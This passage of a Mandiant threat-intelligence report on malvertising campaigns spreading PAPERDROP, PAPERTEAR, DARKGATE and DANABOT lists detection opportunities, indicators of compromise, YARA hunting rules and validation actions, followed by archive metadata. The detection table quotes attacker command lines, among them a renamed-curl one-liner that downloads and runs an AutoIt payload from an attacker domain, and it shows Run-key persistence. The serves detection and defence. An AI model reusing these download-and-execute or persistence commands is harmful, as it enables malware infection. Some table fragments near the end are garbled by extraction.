artifacts that Mandiant discovered beyond the initial detection events that were\r\nused to create additional signatures to identify future activity faster.\r\nAppendix A: Detection Opportunities\r\nSecurity analysts can use the following events as input for testing new or existing signatures for context-based detection or\r\nalerting.\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 20 of 35\n\nDetection\r\nOpportunity\r\nMITRE\r\nATT\u0026CK®\r\nTechnique(s)\r\nEvent Details\r\nMsiexec\r\ninstalling\r\npackage with\r\nmasquerading\r\nfile extension\r\nT1218.007,\r\nT1036.008\r\nParent Process:\r\nC:\\Windows\\System32\\wscript.exe\r\nProcess: \r\nC:\\Windows\\System32\\msiexec.exe\r\nCommand Line:\r\nmsiexec /i C:\\programData\\HLWOIRTAA9P.bin /qn\r\nRundll32\r\nopening the Run\r\nDialog via\r\nshell32.dll\r\nT1218.011\r\nParent Process:\r\nC:\\Windows\\SysWOW64\\rundll32.exe\r\nProcess: \r\nC:\\Windows\\System32\\rundll32.exe\r\nCommand Line:\r\n\"C:\\WINDOWS\\system32\\rundll32.exe\"\r\n\"C:\\WINDOWS\\system32\\shell32.dll\",#61 22405\r\nAnomalous\r\nRundll32 file\r\nwrites to\r\n%Temp%\r\ndirectory\r\nT1218.011\r\nProcess: \r\nC:\\Windows\\SysWOW64\\rundll32.exe\r\nFiles Written:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Sheddth\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Thshiqi\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Qswsweidoeuase\r\nWindows Script\r\nHost executing\r\nfile in\r\ncompressed\r\narchive\r\nT1059.005,\r\nT1204.002\r\nParent Process:\r\nC:\\Windows\\System32\\wscript.exe\r\nProcess: \r\nC:\\Windows\\System32\\msiexec.exe\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 21 of 35\n\nCommand Line:\r\n\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\1\\Temp1_flast_d45534i.zip\\flast_d45534i.vbs”\r\nMsiexec\r\ninstalling\r\npackage located\r\nunder\r\n%ProgramData%\r\nT1218.007\r\nParent Process:\r\nC:\\Windows\\System32\\wscript.exe\r\nProcess: \r\nC:\\Windows\\System32\\msiexec.exe\r\nCommand Line:\r\nmsiexec /i C:\\programData\\FM40VY7.bin /qn\r\nAutoIt script file\r\npayload\r\ndownloaded via\r\ncommand-line\r\nT1105\r\nParent Process:\r\nC:\\Windows\\System32\\wscript.exe\r\nProcess: \r\nC:\\Windows\\System32\\cmd.exe\r\nCommand Line: \r\n\"C:\\Windows\\System32\\cmd.exe\" /c mkdir c:\\yifr \u0026 cd /d c:\\yifr \u0026 copy\r\nc:\\windows\\system32\\curl.exe yifr.exe \u0026 yifr -H \"User-Agent: curl\" -o\r\nAutoit3.exe http[:]//infocatalog[.]pics:8080 \u0026 yifr -o khscrk.au3\r\nhttp[:]//infocatalog[.]pics:8080/msiyifrmouv \u0026 Autoit3.exe khscrk.au3 \r\ncURL binary\r\ncopied via\r\ncommand-line\r\nT1036.003\r\nParent Process:\r\nC:\\Windows\\System32\\cmd.exe\r\nProcess: \r\nC:\\Windows\\System32\\copy.exe\r\nCommand Line: \r\ncopy c:\\windows\\system32\\curl.exe ihcbzhY.exe\r\nSuspected\r\nrenamed cURL\r\nbinary execution\r\nT1105,\r\nT1036.003\r\nParent Process:\r\nC:\\Windows\\System32\\cmd.exe\r\nProcess: \r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 22 of 35\n\nc:\\yifr\\yfir.exe\r\nCommand Line:\r\nyifr -H \"User-Agent: curl\" -o Autoit3.exe http[:]//infocatalog[.]pics:8080\r\nUser-Agent:\r\ncurl\r\nMasquerading\r\ncURL\r\ndownloading\r\nMSI file\r\nT1105,\r\nT1036.003\r\nParent Process:\r\nC:\\Windows\\System32\\cmd.exe\r\nProcess: \r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\CoNyuYT.exe\r\nCommand Line:\r\nCoNyuYT.exe  -o QAcyqLqxgu.msi https[:]//plano.soulcarelife[.]org/?\r\nn0igoun59hzb3eguo63j1hmjobmjw8\r\nSchtasks used to\r\nstop WININET\r\nCache Task\r\nT1053.005\r\nParent Process:\r\nC:\\Windows\\SysWOW64\\rundll32.exe\r\nProcess: \r\nC:\\Windows\\SysWOW64\\schtasks.exe\r\nCommand Line:\r\nschtasks /End /tn \\Microsoft\\Windows\\Wininet\\CacheTask\r\nSchtasks used to\r\nstart WININET\r\nCache Task\r\nT1053.005\r\nParent Process:\r\nC:\\Windows\\SysWOW64\\rundll32.exe\r\nProcess: \r\nC:\\Windows\\SysWOW64\\schtasks.exe\r\nCommand Line:\r\nschtasks /Run /tn \\Microsoft\\Windows\\Wininet\\CacheTask\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 23 of 35\n\nRundll32 loading\r\nDLL file with\r\nanomalous\r\nextension\r\nT1218.011,\r\nT1036.008\r\nProcess: \r\nC:\\Windows\\system32\\rundll32.exe\r\nCommand Line:\r\n\"C:\\WINDOWS\\system32\\RUNDLL32.EXE\" \"C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\Cisco Corp\\Umbrella Roaming Client\\Umbrella\r\nRoaming Client\\CoreReborn32.bin\",start\r\nImage Load:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco Corp\\Umbrella Roaming\r\nClient\\Umbrella Roaming Client\\CoreReborn32.bin\r\nRundll32\r\nmodifying local\r\nproxy settings\r\nT1218.011,\r\nT1562\r\nProcess: \r\nC:\\Windows\\SysWOW64\\rundll32.exe\r\nRegistry Keys:\r\nHKEY_USERS\\\r\n\u003cuser\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet\r\nSettings\\ProxyServer | 127.0.0.1:15064\r\nHKEY_USERS\\\r\n\u003cuser\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet\r\nSettings\\ProxyOverride | 127.0.0.1\r\nRegistry Run\r\nkey with\r\nRundll32\r\ncommand in text\r\nvalue \r\nT1547.001,\r\nT1218.011\r\nRegistry Key:\r\nHKEY_USERS\\\r\n\u003cuser\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Srfshu\r\nText Value:\r\n\"C:\\WINDOWS\\system32\\RUNDLL32.EXE\" \"C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\Cisco Corp\\Umbrella Roaming Client\\Umbrella\r\nRoaming Client\\CoreReborn32.bin\",start\r\nRundll32 process\r\ncreating Run key\r\npersistence\r\nT1547.001,\r\nT1218.011\r\nProcess: \r\nrundll32.exe\r\nRegistry Key:\r\nHKEY_USERS\\\r\n\u003cuser\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Srfshu\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 24 of 35\n\nText Value:\r\n\"C:\\WINDOWS\\system32\\RUNDLL32.EXE\" \"C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\Cisco Corp\\Umbrella Roaming Client\\Umbrella\r\nRoaming Client\\CoreReborn32.bin\",start\r\nRundll32\r\nexecution of file\r\nunder \\AppData\\\r\nT1218.011\r\nParent Process:\r\nC:\\Windows\\Installer\\MSI4F8C.tmp\r\nProcess: \r\nC:\\Windows\\SysWOW64\\rundll32.exe\r\nCommand Line:\r\nC:\\WINDOWS\\system32\\rundll32.exe C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\Oadsoophotfp.dll,start\r\nAppendix B: Indicators of Compromise\r\nType Value Campaign Malware Family Attribution\r\nDomain www.claimprocessing[.]org 23-046   UNC2975\r\nDomain www.treasurydept[.]org 23-046   UNC2975\r\nDomain www.assetfinder[.]org 23-046   UNC2975\r\nDomain gfind[.]org 23-046   UNC2975\r\nDomain claimunclaimed[.]org 23-046   UNC2975\r\nDomain treasurydept[.]org 23-046   UNC2975\r\nDomain www.myunclaimedcash[.]org 23-046   UNC2975\r\nDomain freelookup[.]org 23-046   UNC2975\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 25 of 35\n\nDomain capitalfinders[.]org 23-046   UNC2975\r\nDomain plano.soulcarelife[.]org 23-046 PAPERDROP UNC2975\r\nDomain pittsburgh.soulcarelife[.]org 23-046 PAPERDROP UNC2975\r\nDomain durham.soulcarelife[.]org 23-046 PAPERDROP UNC2975\r\nDomain mesa.halibut[.]sbs 23-046 PAPERDROP UNC2975\r\nDomain arlington.barracudas[.]sbs 23-046 PAPERDROP UNC2975\r\nDomain lugbara[.]top 23-046 PAPERDROP UNC2975\r\nDomain lewru[.]top 23-046 PAPERDROP UNC2975\r\nDomain infocatalog[.]pics 23-046 DARKGATE UNC5085\r\nDomain bikeontop[.]shop 23-046 DARKGATE UNC5085\r\nDomain positivereview[.]cloud 23-046 DARKGATE UNC5085\r\nDomain dreamteamup[.]shop 23-046 DARKGATE UNC5085\r\nDomain whatup[.]cloud 23-046 DARKGATE UNC5085\r\nDomain thebesttime[.]buzz 23-046 DARKGATE UNC5085\r\nIP Address 47.253.165[.]1 23-046   UNC2975\r\nIP Address 8.209.99[.]230 23-046   UNC2975\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 26 of 35\n\nIP Address 47.252.45[.]173 23-046   UNC2975\r\nIP Address 47.252.33[.]131 23-046   UNC2975\r\nIP Address 47.253.141[.]12 23-046   UNC2975\r\nIP Address 47.252.45[.]173 23-046   UNC2975\r\nIP Address 34.16.181[.]0 23-046 DANABOT  \r\nIP Address 35.247.194[.]72 23-046 DANABOT  \r\nIP Address 35.203.111[.]228 23-046 DANABOT  \r\nIP Address 94.228[.]169[.]143 23-051 PAPERTEAR UNC5085\r\nMD5 9f9c5a1269667171e1ac328f7f7f6cb3 23-046 DARKGATE UNC5085\r\nMD5 2c16eafd0023ea5cb8e9537da442047e 23-046 PAPERDROP (Type I) UNC2975\r\nMD5 7544f5bb88ad481f720a9d9f94d95b30 23-046\r\nPAPERDROP\r\n(Type I)\r\nUNC2975\r\nMD5 862a42a91b5734062d47c37fdd80c633  \r\nPAPERDROP\r\n(Type II)\r\nUNC2956\r\nMD5 650b0b12b21e9664d5c771d78738cf9f   PAPERTEAR UNC5085\r\nMD5 9120c82b0920b9db39894107b5494ccd 23-051 PAPERTEAR UNC5085\r\nAppendix C: YARA Rules\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 27 of 35\n\nrule M_Downloader_PAPERDROP_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only and\r\nhas not been tested to run in a production environment.\"\r\n strings:\r\n $v1_1 = \"missing from UIHFad computer\"\r\n $v1_2 = \"Dim UIHFad:set UIHFad = CreateObject(\\\"ADODB.Stream\\\")\"\r\n $v2_1 = \"a = \\\"QJWRWIIPQLYYREESOR\"\r\n $v2_2 = \"temp = temp + ChrW(Dict.Item(Mid(a,y-1,2)))\"\r\n $v3_1 = \"ChrW(Dict.Item(Mid(\"\r\n $v3_2 = \"-1,2)))\"\r\n $v3_3 = \" Mod 2 = 0 and Dict.count \u003c\u003e 256 then\"\r\n $v4_1 = \" = CreateObject(\"\r\n $v4_2 = \" Mod 2 = 0 and \"\r\n $v4_3 = \"Execute(\"\r\n $v4_4 = /if \\w+ Mod 2 = 0 and \\w+.count \u003c\u003e \\w+\r\nthen[\\x0a\\x0d]{1,2}\\w+.Add Mid\\(\\w+,\\w+-1,2\\),/\r\n \r\n condition:\r\n uint16(0)!=0x5A4D and ( all of ($v1*) or all of ($v2*)\r\nor all of ($v3*) or all of ($v4*))\r\n}\r\nrule M_Downloader_PAPERDROP_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n strings:\r\n $str1 = \"Scripting.Dictionary\"\r\n $str2 = \"CreateObject\"\r\n $str3 = \"Execute(\"\r\n $str4 = \"Mod 2 = 0 and\"\r\n $str5 = \"WScript.Sleep\"\r\n $str6 = \"= Timer()\"\r\n $str7 = \"*Rnd+\"\r\n $str8 = \"nP = nP \u0026 \\\"C\\\"\"\r\n condition:\r\n all of them\r\n}\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 28 of 35\n\nrule M_Downloader_PAPERDROP_3\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n strings:\r\n $str1 = \"vbSystemModal+vbCritical\"\r\n $str2 = \"CreateObject(\\\"WScript.Shell\\\")\"\r\n $str3 = \"MSXML2.ServerXMLHTTP\"\r\n $str4 = \"ADODB.Stream\"\r\n $str5 = \"winmgmts:Win32_Process\"\r\n $str8 = \".create\"\r\n condition:\r\n all of them\r\n}\r\nrule M_Downloader_PAPERDROP_4\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n strings:\r\n $str1 = \"-1,2)\"\r\n $str2 = \"CreateObject\"\r\n $str3 = \"Execute(\"\r\n $str4 = \"Mod 2 = 0 and Dict.count = 256 then\"\r\n $str5 = \"= \\\"https://\"\r\n condition:\r\n all of them\r\n}\r\nrule M_Downloader_PAPERTEAR_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n strings:\r\n $s1 = \".setRequestHeader \\\"a\\\", all_process\" ascii\r\n $s2 = \"CreateObject(\" ascii\r\n $s3 = \"Select * from Win32_Process\" ascii\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 29 of 35\n\n$s4 = \"For Each\" ascii\r\n $s5 = \"HTTP\" ascii\r\n condition:\r\n filesize \u003c 1MB and all of ($s*)\r\n}\r\nrule M_Downloader_PAPERTEAR_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n strings:\r\n $str1 = \"WinHTTPRequest\" ascii\r\n $str2 = \"ShellExecute\" ascii\r\n $str3 = \".Open \\\"post\\\"\" ascii\r\n $str4 = \".responseText\" ascii\r\n $str5 = \"Shell.Application\" ascii\r\n condition:\r\n all of them and filesize \u003c 5MB\r\n}\r\nrule M_Backdoor_DARKGATE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n strings:\r\n $str1 = \"IF ( NOT FILEEXISTS ( @PROGRAMFILESDIR ) )\r\nAND ( @USERNAME \u003c\u003e \\\"SYSTEM\\\" ) THEN\"\r\n $str2 = \"BINARYTOSTRING ( \\\"0x\\\" \u0026\"\r\n $str3 = \"C:\\\\Program Files (x86)\\\\Sophos\"\r\n $str4 = \"EXECUTE (BINARYTOSTRING ( \\\"0x\"\r\n $str5 = \"DLLSTRUCTCREATE\"\r\n $str6 = \"446C6C43616C6C28227573657233322E646C6C222C20226C726573756\r\nC74222C20224322266368722839372926226C6C57696E646F7750726F63222C20227\r\n07472222C20446C6C5374727563744765745074722824\"\r\n condition:\r\n all of them and filesize \u003c 500KB\r\n}\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 30 of 35\n\nrule M_Backdoor_DARKGATE_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n strings:\r\n $str1 = \"IF ( NOT FILEEXISTS ( @PROGRAMFILESDIR ) ) AND\r\n( @USERNAME \u003c\u003e \\\"SYSTEM\\\" ) THEN\"\r\n $str2 = \"BINARYTOSTRING ( \\\"0x\\\" \u0026\"\r\n $str3 = \"C:\\\\Program Files (x86)\\\\Sophos\"\r\n $str4 = \"EXECUTE ( BINARYTOSTRING ( \\\"0x\"\r\n $str5 = \"DLLSTRUCTCREATE\"\r\n $str6 = \"00C680A438000045C680A538000000C680A638000049C680A738000000C68\r\n0A83800004EC680A938000000C680AA38000046\"\r\n $str7 = \"CF013183C0024B75D28B420403C28BD08BC28BC82B4DD48B5DDC3B8BA4000000\r\n72A68B45DC8B40288945E48B45E80345E4FF\"\r\n $str8 = \"446C6C43616C6C28227573657233322E646C6C222C20226C726573756C74222C\r\n20224322266368Ω22839372926226C6C57696E646F7750726F63222C2022707472222\r\nC20446C6C5374727563744765745074722824\"\r\n condition:\r\n all of them\r\n}\r\nrule M_Backdoor_DARKGATE_3\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n strings:\r\n $x1 = \"SYSTEM Elevation: Completed, new DarkGate connection with\r\nSYSTEM privileges\" ascii\r\n $x2 = \"-u 0xDark\" ascii\r\n $x3 = \"DarkGate\" ascii\r\n $x4 = \"/c cmdkey /generic:\\\"127.0.0.2\\\" /user:\\\"SafeMode\\\"\r\n/pass:\\\"darkgatepassword0\\\"\" ascii\r\n $s1 = \"c:\\\\temp\\\\crash.txt\" ascii\r\n $s2 = \"/cookiesfile \\\"\" ascii\r\n $s3 = \"/c rmdir /s /q \\\"\" ascii\r\n $s4 = \"/c xcopy /E /I /Y \\\"%s\\\" \\\"%s\\\" \u0026\u0026 exit\" ascii\r\n $s5 = \"U_MemScan\" ascii\r\n $s6 = \"U_Google_AD\" ascii\r\n $s7 = \"untBotUtils\" ascii\r\n $s8 = \"____padoru____\" ascii\r\n $s9 = \"u_SysHook\" ascii\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 31 of 35\n\n$s10 =\r\n\"zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=\" ascii\r\n $s11 = \"C:\\\\Windows\\\\System32\\\\ntdll.dll\" fullword ascii\r\n $s12 = /(SYSTEM )?Elevation: (Cannot|I already|AT RAW|FAILURE)/ ascii\r\n $s13 = /Stub: (WARNING:|Configuration updated:\r\n|Global Ping Invoked)/ ascii\r\n condition:\r\n (uint16(0)==0x5a4d and ((3 of ($x*)) or (2 of ($x*) and 3 of ($s*))\r\nor (1 of ($x*) and 5 of ($s*)) or (6 of ($s*)))) or (10 of them)\r\n}\r\nrule M_Backdoor_DANABOT_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n \r\n strings:\r\n $api1 = \"ZwWow64WriteVirtualMemory64\" wide\r\n $api2 = \"ConvertStringSecurityDescriptorToSecurityDescriptorW\" wide\r\n $code1 = { DF 2C 01 DF 28 83 F9 08 7E 11 DF 68 08 83 F9 10 7E 06 DF\r\n68 10 DF 7A 10 DF 7A 08 DF 3A DF 3C 11 }\r\n $code2 = { 8A 45 AB 04 9F 2C 1A 73 04 }\r\n condition:\r\n uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550\r\nand all of them\r\n}\r\nimport \"pe\"\r\nrule M_Backdoor_DANABOT_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n disclaimer = \"This rule is for hunting purposes only\r\nand has not been tested to run in a production environment.\"\r\n strings:\r\n $code = { A1 [4] 05 [4] A3 [4] A1 [4] 2B 05 [4] A3 [4] 83 7D BC 0B }\r\n $str1 = \"System.Xml.XmlSerializer.dll\" wide\r\n $str2 = \"System.IO.Log.ni.dll\" wide\r\n $str3 = \"ncrypt.dll\" wide\r\n condition:\r\n uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 32 of 35\n\npe.is_dll() and (pe.exports(\"ServiceMain\") and pe.exports(\"start\")) and all of them\r\n}\r\nAppendix D: Mandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nS100-302 Malicious Activity Scenario - PAPERDROP and DANABOT Infection Chain, Variant #1\r\nS100-301 Malicious Activity Scenario - PAPERTEAR and DARKGATE Infection Chain, Variant #1\r\nS100-299 Malicious Activity Scenario - PAPERDROP and DANABOT Infection Chain, Variant #2\r\nA106-888 Command and Control - PAPERTEAR, Download File Attempt, Variant #1\r\nA106-781 Command and Control - UNC2975, DNS Query, Variant #1\r\nA106-890 Command and Control - UNC2975, DNS Query, Variant #10\r\nA106-782 Command and Control - UNC2975, DNS Query, Variant #2\r\nA106-884 Command and Control - UNC2975, DNS Query, Variant #3\r\nA106-872 Command and Control - UNC2975, DNS Query, Variant #4\r\nA106-882 Command and Control - UNC2975, DNS Query, Variant #5\r\nA106-873 Command and Control - UNC2975, DNS Query, Variant #6\r\nA106-886 Command and Control - UNC2975, DNS Query, Variant #7\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 33 of 35\n\nA106-875 Command and Control - UNC2975, DNS Query, Variant #8\r\nA106-874 Command and Control - UNC2975, DNS Query, Variant #9\r\nA106-784 Command and Control - UNC2975, PAPERDROP, DNS Query, Variant #1\r\nA106-783 Command and Control - UNC2975, PAPERDROP, HTTP GET, Variant #1\r\nA106-877 Host CLI - Launch Run Dialog via CMD\r\nA104-160 Host CLI - Registry Run Keys\r\nA106-887 Malicious File Transfer - AUTOIT, Download, Variant #1\r\nA106-891 Malicious File Transfer - UNC2975, DANABOT Dropper, Download, Variant #1\r\nA106-786 Malicious File Transfer - UNC2975, DANABOT, Download, Variant #1\r\nA106-785 Malicious File Transfer - UNC2975, PAPERDROP Zip File, Variant #1\r\nA106-880 Malicious File Transfer - UNC5085, AUTOIT Script Containing DARKGATE, Variant #1\r\nA151-259 Protected Theater - DANABOT, Execution\r\nA106-876 Protected Theater - DANABOT, Stop and Start Wininet Cache Task\r\nA106-879 Protected Theater - UNC2975, DANABOT Dropper, Download, Variant #1\r\nA106-787 Protected Theater - UNC2975, DANABOT MSI Dropper, Variant #1\r\nA106-787 Protected Theater - UNC2975, DANABOT MSI Dropper, Variant #1\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 34 of 35\n\nA106-770 Protected Theater - UNC4962, DARKGATE, Execution, Variant #1\r\nA106-871 Protected Theater - UNC5085, DARKGATE Installer, Execution, Variant #1\r\nAcknowledgements\r\nThe authors would like to thank all of the technical reviewers and blog contributors spanning multiple teams, including\r\nManaged Defense Threat Hunting, Advanced Analysis (AA), Advanced Practices (AP), Mandiant Intelligence (MI),\r\nGoogle Trust and Safety, Mandiant Communications Center (MCC), and trusted external partners. We’d also like to thank\r\nthe Managed Defense SOC analysts who provided investigative support responding to these campaigns to protect our\r\ncustomers and the Detection Engineering and Automations (DEA) team for contributing detection content to finding new\r\nthreats faster and more effectively. Credit for the creation of new Mandiant Security Validation actions goes to Lexie Aytes\r\nand the Validation Research team. And a tip of the hat to Ana Foreman for the timeline graphics.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 35 of 35\n\nDomain Domain whatup[.]cloud thebesttime[.]buzz 23-046 23-046 DARKGATE DARKGATE UNC5085 UNC5085\nIP Address 47.253.165[.]1 23-046 UNC2975\nIP Address 8.209.99[.]230 23-046 UNC2975\n  Page 26 of 35 \n\nS100-299 A106-888 Malicious Command Activity Scenario and Control - PAPERDROP - PAPERTEAR, and DANABOT Infection Download File Attempt, Chain, Variant Variant #1 #2\nA106-781 Command and Control -UNC2975, DNS Query, Variant #1\nA106-890 Command and Control -UNC2975, DNS Query, Variant #10\nA106-782 Command and Control -UNC2975, DNS Query, Variant #2\nA106-884 Command and Control -UNC2975, DNS Query, Variant #3\nA106-872 Command and Control -UNC2975, DNS Query, Variant #4\nA106-882 Command and Control -UNC2975, DNS Query, Variant #5\nA106-873 Command and Control -UNC2975, DNS Query, Variant #6\nA106-886 Command and Control -UNC2975, DNS Query, Variant #7\n    Page 33 of 35",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors"
	],
	"report_names": [
		"detecting-disrupting-malvertising-backdoors"
	],
	"threat_actors": [
		{
			"id": "908cf62e-45cd-492b-bf12-d0902e12fece",
			"created_at": "2024-08-20T02:00:04.543947Z",
			"updated_at": "2026-04-10T02:00:03.68848Z",
			"deleted_at": null,
			"main_name": "UNC4393",
			"aliases": [
				"Storm-1811",
				"CURLY SPIDER",
				"STAC5777"
			],
			"source_name": "MISPGALAXY:UNC4393",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434211,
	"ts_updated_at": 1775826783,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d840fb5f1929247ffb5487c46d3026de97479ac8.pdf",
		"text": "https://archive.orkl.eu/d840fb5f1929247ffb5487c46d3026de97479ac8.txt",
		"img": "https://archive.orkl.eu/d840fb5f1929247ffb5487c46d3026de97479ac8.jpg"
	}
}